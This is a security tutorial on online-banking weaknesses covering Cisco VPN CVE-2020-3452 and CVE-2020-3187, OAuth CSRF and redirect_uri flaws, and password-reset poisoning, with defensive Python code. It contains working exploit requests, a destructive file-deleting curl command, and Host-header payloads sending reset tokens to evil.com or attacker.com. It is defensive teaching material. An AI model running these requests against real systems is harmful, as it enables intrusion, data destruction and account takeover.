Online banking security issues

Hello friends!

Today we will talk about the pressing security problems of banking systems: we will analyze common vulnerabilities and draw conclusions from them.





Important

As always, the author does not claim to show how to fully protect your system from cyber threats; the aim is only to point out the problems you should pay attention to.





1. SSL VPN Services

Banks very often use Cisco SSL VPN services (the WebVPN/AnyConnect portal on ASA and FTD appliances) to organize remote access to their internal network.

Two vulnerabilities from 2020 in these products deserve attention: CVE-2020-3452 and CVE-2020-3187.





1.1. CVE-2020-3452

CVE-2020-3452 is a path traversal vulnerability in the web services interface of Cisco ASA and FTD Software. Insufficient validation of the URL lets an unauthenticated remote attacker read files from the web services file system (WebVPN Lua sources, translation tables and similar files, but not the running configuration or the underlying OS) with a single crafted HTTP request:









https://bank.com/+CSCOT+/translation-table?type=mst&textdomain=/%252bCSCOE%252b/portal_inc.lua&default-language&lang=../

If the device is vulnerable, the response contains the source of portal_inc.lua instead of a translation table. The traversal is read-only, but the files it exposes let an attacker study the VPN portal before going further.
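A small checker for this vulnerability, written for this article as an added example (it is not code from the original post or from Cisco): it builds the same traversal URL, classifies a response offline, and only touches the network when called with a host. The Lua and gettext line markers used to tell a leaked Lua file from a real translation table are a heuristic assumed by this example, and the sample responses are constructed, not captured from a device.

```python
import re
import ssl
import sys
import urllib.error
import urllib.request
from urllib.parse import quote

# Added example for this article, not code from the original post or from Cisco.
# The request path is the public CVE-2020-3452 detection URL with "+" percent-encoded once;
# the response classification below is a heuristic assumed by this example.
TRAVERSAL_PATH = (
    "/+CSCOT+/translation-table?type=mst"
    "&textdomain=/" + quote("+CSCOE+") + "/portal_inc.lua"
    "&default-language&lang=../"
)

# Lines that start a Lua comment, local declaration or function definition.
LUA_MARKERS = re.compile(r"^\s*(?:--|local\s+\w+|function\s+[\w.:]+\s*\()", re.M)
# Lines of a real gettext-style translation table.
GETTEXT_MARKERS = re.compile(r'^\s*msg(?:id|str)\s+"', re.M)

# Constructed sample responses (not captured from a real appliance).
SAMPLE_LEAKED_LUA = b'-- portal_inc.lua\nlocal util = require("util")\nfunction render(page)\n  return page\nend\n'
SAMPLE_TRANSLATION = b'msgid "Login"\nmsgstr "Login"\n'


def build_check_url(host: str) -> str:
    """URL that asks the translation-table handler for a Lua source instead of a catalogue."""
    return f"https://{host}{TRAVERSAL_PATH}"


def classify_response(status: int, body: bytes) -> str:
    """Interpret a response to build_check_url().

    A vulnerable device returns the contents of portal_inc.lua; a patched one
    answers with an error or a normal translation table.
    """
    if status in (400, 403, 404):
        return "not-vulnerable"
    if status != 200:
        return "inconclusive"
    text = body.decode("utf-8", errors="replace")
    if LUA_MARKERS.search(text) and not GETTEXT_MARKERS.search(text):
        return "vulnerable"
    return "not-vulnerable"


def probe(host: str, timeout: float = 10.0) -> str:
    """Send the check to a live appliance. Run it only against hosts you are authorized to test."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False  # VPN portals frequently use self-signed certificates
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(build_check_url(host), headers={"User-Agent": "cve-2020-3452-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return classify_response(resp.status, resp.read())
    except urllib.error.HTTPError as exc:
        return classify_response(exc.code, exc.read())


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(sys.argv[1], probe(sys.argv[1]))
    else:
        print("offline demo:", classify_response(200, SAMPLE_LEAKED_LUA),
              classify_response(200, SAMPLE_TRANSLATION))
```

Run it as `python check.py vpn.bank.example` against your own appliance; without an argument it only classifies the two constructed samples. The classifier deliberately treats anything other than a clear Lua body as not vulnerable, so a WAF that rewrites the response will show up as a miss rather than a false positive.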





1.2. CVE-2020-3187





CVE-2020-3187 is a traversal in the same web services interface, but this one lets an unauthenticated attacker delete files. The quickest check uses the file /+CSCOE+/session_password.html. First make sure it exists and responds with HTTP 200:

curl -k -s -i https://<Cisco-VPN>/+CSCOE+/session_password.html

Got 200? Then confirm that the logo file "/+CSCOU+/csco_logo.gif" is also served. The token cookie on the session page is used to locate a file without validation, so a traversal sequence in it removes whichever file it points to:

curl -k -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://<Cisco-VPN>/+CSCOE+/session_password.html

If /+CSCOU+/csco_logo.gif now returns 404, the file was deleted and the VPN is vulnerable. Keep in mind that this check is destructive: it really removes the logo from the appliance, so run it only against devices you are authorized to test.





2. SSO & OAuth

Single sign-on (SSO) in banking applications is usually built on OAuth 2.0, and the weak points are always the same: the callback that receives the authorization code and the redirect_uri the code is sent to. A typical callback request looks like this:





GET /auth/sso/cb?code=[sso token account] HTTP/1.1

Host: bank.com

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close









If the callback does not bind the flow to the user's session (there is no state parameter, or it is not checked), it is vulnerable to CSRF. The attack on account linking goes like this:

  1. The attacker starts the SSO login with their own SSO account and intercepts the callback request carrying their code.

  2. Instead of completing the flow, the attacker sends that callback URL to the victim, who is already logged in to the bank.

  3. The victim's browser sends the request, and the bank links the attacker's SSO account to the victim's bank account.

  4. The attacker now logs in through SSO and lands in the victim's account.





redirect_uri is the URL to which the authorization server sends the code after login. If the server compares it loosely (prefix match, wildcard subdomains, ignored path or query), an attacker can make the code or token arrive at a host they control and then log in as the victim.
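Both problems come down to two checks in the client side of the flow. The following is an added example written for this article, not the bank's or any vendor's implementation (the IdP URL, client id, registered callback and the session dictionary are assumptions): a state value minted per session and verified exactly once on the callback, plus an exact redirect_uri comparison shown next to the loose prefix check that the bypass relies on.

```python
import hmac
import secrets
from urllib.parse import urlencode, urlsplit

# Added example, not the bank's or any vendor's code. The IdP URL, client id,
# registered callback and the session dictionary are assumptions of this example.
AUTHORIZE_URL = "https://sso.example/oauth/authorize"
CLIENT_ID = "bank-web"
REGISTERED_REDIRECT_URIS = {"https://bank.com/auth/sso/cb"}


def begin_login(session: dict) -> str:
    """Start the flow: mint a random state, bind it to this session, build the authorize URL."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    query = urlencode({
        "response_type": "code",
        "client_id": CLIENT_ID,
        "redirect_uri": next(iter(REGISTERED_REDIRECT_URIS)),
        "state": state,
    })
    return f"{AUTHORIZE_URL}?{query}"


def handle_callback(session: dict, params: dict) -> str:
    """Process GET /auth/sso/cb?code=...&state=... and return the code to exchange.

    A link forged by an attacker carries no state, or a state from the attacker's
    own session, so it is rejected here before any account gets linked.
    """
    expected = session.pop("oauth_state", None)  # single use: replaying the callback fails too
    received = params.get("state")
    if expected is None or received is None or not hmac.compare_digest(expected, received):
        raise PermissionError("state missing or bound to another session: possible login CSRF")
    code = params.get("code")
    if not code:
        raise ValueError("callback without authorization code")
    return code


def callback_rejected(session: dict, params: dict) -> bool:
    """True when handle_callback() refuses the request (used by the demo below)."""
    try:
        handle_callback(session, params)
    except (PermissionError, ValueError):
        return True
    return False


def redirect_uri_allowed_weak(uri: str) -> bool:
    """The loose check that causes the bug: anything starting with the bank origin passes."""
    return uri.startswith("https://bank.com")


def redirect_uri_allowed(uri: str) -> bool:
    """Strict check: scheme, host, port and path must equal a registered URI; no query, no fragment."""
    parts = urlsplit(uri)
    if parts.scheme != "https" or parts.query or parts.fragment or parts.port not in (None, 443):
        return False
    if "/../" in parts.path or parts.path.endswith("/.."):
        return False
    candidate = f"{parts.scheme}://{parts.hostname}{parts.path}"
    return candidate in REGISTERED_REDIRECT_URIS


if __name__ == "__main__":
    victim = {}
    begin_login(victim)
    # The forged callback from step 2 above: attacker's code, no state for this session.
    print("forged callback rejected:", callback_rejected(victim, {"code": "attackers-code"}))
    for uri in ("https://bank.com/auth/sso/cb", "https://bank.com.evil.com/auth/sso/cb",
                "https://bank.com@evil.com/auth/sso/cb"):
        print(uri, "weak:", redirect_uri_allowed_weak(uri), "strict:", redirect_uri_allowed(uri))
```

The state is popped from the session, not just read, so a callback can be consumed once; the two redirect_uri functions show why "starts with https://bank.com" accepts bank.com.evil.com and bank.com@evil.com while an exact, component-wise match does not.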









Password reset poisoning is the same story with the Host header: the reset endpoint builds the link in the e-mail from the host it sees in the request. The attacker requests a reset for the victim's address but sends a spoofed Host:

POST https://bank.com/reset.php HTTP/1.1

Accept: */*

Content-Type: application/json

Host: evil.com

If the application sits behind a proxy, the same effect can be achieved with X-Forwarded-Host:

Host: bank.com

X-Forwarded-Host: attacker.com

or with a duplicated Host header, hoping the back end uses the second value:

Host: target.com

Host: attacker.com

The victim receives an e-mail with a link that points to the attacker's host:

https://evil.com/reset-password.php?token=12345678-1234-1234-1234-12345678901

When the victim clicks it, the reset token goes to the attacker's server, and the attacker uses it on the real site to set a new password.

A second variant of the same attack is parameter pollution in the reset form:





POST /resetPassword

[…]

email=victim@email.com&email=attacker@email.com








In this request the attacker simply duplicated the email parameter and added their own address, so the reset token is sent there as well.
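An added example (not the bank's code; CANONICAL_ORIGIN, the header dictionary, the form-encoded body and the in-memory accounts and outbox stand-ins are assumptions) that puts the poisoned link builder next to a hardened reset handler: the link comes from configuration, never from Host or X-Forwarded-Host, and a form with more than one email parameter is rejected instead of quietly taking one of them. Not reading the host at all also covers the duplicated Host header variant.

```python
import secrets
from urllib.parse import parse_qs

# Added example, not the bank's code. CANONICAL_ORIGIN, the header dictionary, the
# form-encoded body and the accounts/outbox stand-ins are assumptions of this example.
CANONICAL_ORIGIN = "https://bank.com"


def poisoned_reset_link(headers: dict, token: str) -> str:
    """Vulnerable: the link's host comes from the request, so Host / X-Forwarded-Host choose it."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    return f"https://{host}/reset-password.php?token={token}"


def reset_link(token: str) -> str:
    """Hardened: the link is built from configuration; request headers are never consulted."""
    return f"{CANONICAL_ORIGIN}/reset-password.php?token={token}"


def parse_reset_form(body: str) -> str:
    """Return the single e-mail address from the form; a duplicated 'email' parameter is an error."""
    fields = parse_qs(body, keep_blank_values=True, strict_parsing=True)
    emails = fields.get("email", [])
    if len(emails) != 1:
        raise ValueError(f"expected exactly one email parameter, got {len(emails)}")
    return emails[0]


def reset_rejected(body: str) -> bool:
    """True when parse_reset_form() refuses the body (used by the demo below)."""
    try:
        parse_reset_form(body)
    except ValueError:
        return True
    return False


def handle_reset(headers: dict, body: str, accounts: dict, outbox: list) -> str:
    """Reset handler: one address, a fresh token stored per account, a link on the canonical host."""
    email = parse_reset_form(body)
    if email in accounts:
        token = secrets.token_urlsafe(32)
        accounts[email]["reset_token"] = token
        outbox.append((email, reset_link(token)))  # headers are deliberately unused here
    # Same answer whether or not the address exists, so the form cannot be used for enumeration.
    return "If the address is registered, a reset link has been sent."


# Constructed sample data for the offline demo.
SAMPLE_ACCOUNTS = {"victim@email.com": {"reset_token": None}}
POISONING_HEADERS = {"Host": "bank.com", "X-Forwarded-Host": "attacker.com"}
POLLUTED_BODY = "email=victim@email.com&email=attacker@email.com"


if __name__ == "__main__":
    print("poisoned:", poisoned_reset_link(POISONING_HEADERS, "12345678-1234-1234-1234-12345678901"))
    print("hardened:", reset_link("12345678-1234-1234-1234-12345678901"))
    print("polluted form rejected:", reset_rejected(POLLUTED_BODY))
    outbox = []
    handle_reset(POISONING_HEADERS, "email=victim@email.com", SAMPLE_ACCOUNTS, outbox)
    print("mail sent to:", outbox)
```

Two details are worth copying: the token is generated only when an account exists, but the response text is identical either way, and the link builder has no access to the request at all, which is the only reliable way to rule out every header-based variant shown above.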





Conclusion

Keep your services up to date, whether it's Cisco SSL VPN or GlobalProtect.

Keep authentication secure: bind SSO flows to the session with a state parameter, validate redirect_uri exactly, build password reset links from configuration rather than the Host header, and reject duplicated parameters.

Also, as a tip, use a Web Application Firewall (WAF) as an extra layer against exploitation of vulnerabilities introduced by code changes.





Good luck! All the best.







